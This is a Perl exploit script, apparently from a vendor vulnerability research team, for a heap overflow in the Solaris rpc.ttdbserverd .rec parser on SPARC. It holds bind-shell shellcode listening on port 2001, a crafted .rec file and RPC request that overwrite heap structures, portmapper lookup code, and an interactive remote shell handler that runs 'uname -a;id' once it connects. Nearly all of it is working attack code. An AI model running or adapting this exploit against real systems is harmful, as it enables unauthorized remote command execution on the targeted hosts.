##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> #
# #
# RPC TTDB .rec parser Heap Overflow #
# #
# thr_jmp_table does not exist on Solaris 10 u8 so use the -a #
# option to specify the address of the saved window or other structures #
# to overwrite #
##########################################################################
use POSIX;
use IO::Socket;
use IO::Select;
use Getopt::Std;
$shellrise =
"\xa0\x23\xa0\x10".# /* sub %sp, 16, %l0 */
"\xae\x23\x80\x10".# /* sub %sp, %l0, %l7 */
"\xee\x23\xbf\xec".# /* st %l7, [%sp - 20] */
"\x82\x05\xe0\xd6".# /* add %l7, 214, %g1 */
"\x90\x25\xe0\x0e".# /* sub %l7, 14, %o0 */
"\x92\x25\xe0\x0e".# /* sub %l7, 14, %o1 */
"\x94\x1c\x40\x11".# /* xor %l1, %l1, %o2 */
"\x96\x1c\x40\x11".# /* xor %l1, %l1, %o3 */
"\x98\x25\xe0\x0f".# /* sub %l7, 15, %o4 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\xa4\x1a\x80\x08".# /* xor %o2, %o0, %l2 */
"\xd2\x33\xbf\xf0".# /* sth %o1, [%sp - 16] */
"\xac\x10\x27\xd1".# /* mov 2001, %l6 */
"\xec\x33\xbf\xf2".# /* sth %l6, [%sp - 14] */
"\xc0\x23\xbf\xf4".# /* st %g0, [%sp - 12] */
"\x82\x05\xe0\xd8".# /* add %l7, 216, %g1 */
"\x90\x1a\xc0\x12".# /* xor %o3, %l2, %o0 */
"\x92\x1a\xc0\x10".# /* xor %o3, %l0, %o1 */
"\x94\x1a\xc0\x17".# /* xor %o3, %l7, %o2 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\x82\x05\xe0\xd9".# /* add %l7, 217, %g1 */
"\x90\x1a\xc0\x12".# /* xor %o3, %l2, %o0 */
"\x92\x25\xe0\x0b".# /* sub %l7, 11, %o1 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\x82\x05\xe0\xda".# /* add %l7, 218, %g1 */
"\x90\x1a\xc0\x12".# /* xor %o3, %l2, %o0 */
"\x92\x1a\xc0\x10".# /* xor %o3, %l0, %o1 */
"\x94\x23\xa0\x14".# /* sub %sp, 20, %o2 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\xa6\x1a\xc0\x08".# /* xor %o3, %o0, %l3 */
"\x82\x05\xe0\x2e".# /* add %l7, 46, %g1 */
"\x90\x1a\xc0\x13".# /* xor %o3, %l3, %o0 */
"\x92\x25\xe0\x07".# /* sub %l7, 7, %o1 */
"\x94\x1b\x80\x0e".# /* xor %sp, %sp, %o2 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\x90\x1a\xc0\x13".# /* xor %o3, %l3, %o0 */
"\x92\x25\xe0\x07".# /* sub %l7, 7, %o1 */
"\x94\x02\xe0\x01".# /* add %o3, 1, %o2 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\x90\x1a\xc0\x13".# /* xor %o3, %l3, %o0 */
"\x92\x25\xe0\x07".# /* sub %l7, 7, %o1 */
"\x94\x02\xe0\x02".# /* add %o3, 2, %o2 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\x90\x1b\x80\x0e".# /* xor %sp, %sp, %o0 */
"\x82\x02\xe0\x17".# /* add %o3, 23, %g1 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\x21\x0b\xd8\x9a".# /* sethi %hi(0x2f626800), %l0 */
"\xa0\x14\x21\x6e".# /* or %l0, 0x16e, %l0 ! 0x2f62696e */
"\x23\x0b\xdc\xda".# /* sethi %hi(0x2f736800), %l1 */
"\x90\x23\xa0\x10".# /* sub %sp, 16, %o0 */
"\x92\x23\xa0\x08".# /* sub %sp, 8, %o1 */
"\x94\x1b\x80\x0e".# /* xor %sp, %sp, %o2 */
"\xe0\x3b\xbf\xf0".# /* std %l0, [%sp - 16] */
"\xd0\x23\xbf\xf8".# /* st %o0, [%sp - 8] */
"\xc0\x23\xbf\xfc".# /* st %g0, [%sp - 4] */
"\x82\x02\xe0\x3b".# /* add %o3, 59, %g1 */
"\x91\xd0\x38\x08".# /* ta 0x8 */
"\x90\x1b\x80\x0e".# /* xor %sp, %sp, %o0 */
"\x82\x02\xe0\x01".# /* add %o3, 1, %g1 */
"\x91\xd0\x38\x08";# /* ta 0x8 */
getopts('h:o:f:a:',\%args);
if(defined($args{'h'})){ $host = $args{'h'}; }else{ $host = "localhost"; }
if(defined($args{'o'})){ $offset = $args{'o'}; }else{ $offset = 0; }
if(defined($args{'f'})){ $file = $args{'f'}; }else{ $file = "/tmp/owned"; }
if(defined($args{'a'})){ $addr = hex($args{'a'}); }else{ $addr = 0; }
print STDERR "-= rpc.ttdbserverd .rec parser exploit for Solaris 9/10 SPARC =-\n";
print STDERR "-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n";
print STDERR "-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n";
print STDERR " Usage: [-f] /file/name [-h] hostname [-o] offset [-a] addr\n";
$remote = 1;
if($host =~ /localhost/){
$remote = 0;
if(!$addr){
$addr = get_thr_addr();
}
}
$heap = $addr - 8; # Where to write
$pheap = pack('l',$heap);
$stck = 0x00087080 + $offset; # Shellcode Address
$pstck = pack('l',$stck);
$null = $heap + 0x300; # Poiting to null
$pnull = pack('l',$null);
$rpcdata = # rpc.ttdbserverd is_erase procedure call
"\x80\x00\x00\x98\x19\x38\xba\x51\x00\x00\x00\x00\x00\x00".
"\x00\x02\x00\x01\x86\xf3\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00".
"\x00\x01\x00\x00\x00\x20\x4b\x3b\x63\x40\x00\x00\x00\x09\x6c\x6f".
"\x63\x61\x6c\x68\x6f\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
pack('N',length($file)) .
$file.
"\x00\x00\x00\x00\x00".
"\x20\x00" . "a" x ( 5 - (length($file) % 4)).
"\x10\x80\x00\x03" x (( 7596 - length($shellrise))/4).
"\x80\x1c\x40\x11" x 2 . $shellrise . "\x00" x 593 .
"\x00\x00\x00\x00\x00\x04\x35\x36\x37\x38".
"\x00\x00\x00\x00\x00\x04\x39\x40\x41\x42\x00\x00\x00\x00\x00\x04".
"\x43\x44\x45\x46\x00\x00\x00\x00\x00\x04\x47\x48\x49\x50\x00\x00".
"\x00\x00\x00\x04\x51\x52\x53\x54\x00\x00\x00\x04\x55\x56\x57\x58";
$rec =
"\x4E\x65\x74\x49\x53\x41\x4D\x00\x55\x6E\x6B\x6E\x6F\x77\x6E\x00".
"\x31\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x03\x00\x1C\x00\x1C\x00\x00\x00\x00\x00\x03\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x04".
"\xFF\xFF\xFF\xFF\x00\x01".
"\x78" x 122 .
"\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0f".
"\x00\x00".
"\x00\x00\x00\x00".
"\xff\xff\xff\xf0" x 21 .
"\x00\x00\x00\x00".
"\xff\xff\xff\xff".
$pstck.
"\x00\x00\x00\x00".
"\xff\xff\xff\xff".
"\xff\xff\xff\xff".
$pnull.
"\xff\x00\x00\x00".
$pheap.
"\x44" x 3000;
if(!$remote){
$file = $file . ".rec";
open(F,">$file") or die("Cant create $file!");
print STDERR "[+] Creating file " . $file . "\n";
print F $rec;
close(F);
print STDERR "[+] Writing 0x" . sprintf('%lx',$stck) . " to 0x" . sprintf('%lx', $heap + 8) . "\n";
}
$port = rpc_getport($host, 111, 100083, 1);
if(!$port){ die ("[-] TTDB not running on target!\n");}
print STDERR "[+] TTDB running on port $port\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "[-] Cant Connect!!\n";
print STDERR "[+] Sending stuff to TTDB ...";
#<STDIN>;
print $sock $rpcdata;
print STDERR "d0ne!\n";
close($sock);
print STDERR "[+] Wait a little!\n";
sleep(2);
$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>2001,Type=>SOCK_STREAM,Reuse=>1)
or die "[*] No luck :(\n\n";
print "[*] We got in =)\n";
$sc->autoflush(1);
sleep(2);
print $sc "echo;uname -a;id;echo\n";
die "cant fork: $!" unless defined($pid = fork());
if ($pid){
while(defined ($line = <$sc>)){
print STDOUT $line;
}
kill("TERM", $pid);
}else{
while(defined ($line = <STDIN>)) {
print $sc $line;
}
}
close($sc);
print "Good bye!!\n";
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;
my $s = rpc_socket($target_host, $target_port);
my $portmap_req =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x86\xa0". # Program Number (PORTMAP)
"\x00\x00\x00\x02". # Program Version (2)
"\x00\x00\x00\x03". # Procedure (getport)
("\x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x6). # Protocol: TCP
pack("N", 0x00); # Port: 0
print $s $portmap_req;
my $r = rpc_read($s);
close ($s);
if (length($r) == 28){
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}
return undef;
}
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);
if (! $s){
print "\nError: could not create socket to target: $!\n";
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}
sub rpc_read {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub nonblock {
my ($fd) = @_;
my $flags = fcntl($fd, F_GETFL,0);
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}
sub hexdump
{
my ($buf) = @_;
my ($p, $c, $pc, $str);
my ($i);
for ($i=0;$i<length($buf);$i++){
$p = substr($buf, $i, 1);
$c = ord ($p);
printf "%.2x ", $c;
$pc++;
if (($c > 31) && ($c < 127)){
$str .= $p;
}else{
$str .= ".";
}
if ($pc == 16){
print " $str\n";
undef $str;
$pc = 0;
}
}
print " " x (16 - $pc);
print " $str \n";
}
sub get_thr_addr {
$cmd = `/usr/ccs/bin/dump -t /lib/ld.so.1 | grep thr_jmp_table`;
($xx,$thr) = split(/ /,$cmd);
if(!$thr){
die("thr_jmp_table not found!\n");
}
$cmd2 = `/bin/pmap $$ | grep /lib/ld.so.1`;
($base,$yy) = split(/ /,$cmd2);
if(!$base){
die("error geting base addr\n");
}
$base = hex($base);
$thr = hex($thr);
print STDERR "[+] Base at: 0x" . sprintf('%lx',$base) . "\n";
print STDERR "[+] thr_jmp_table at: 0x" . sprintf('%lx',$thr) . "\n";
return $base + $thr;
}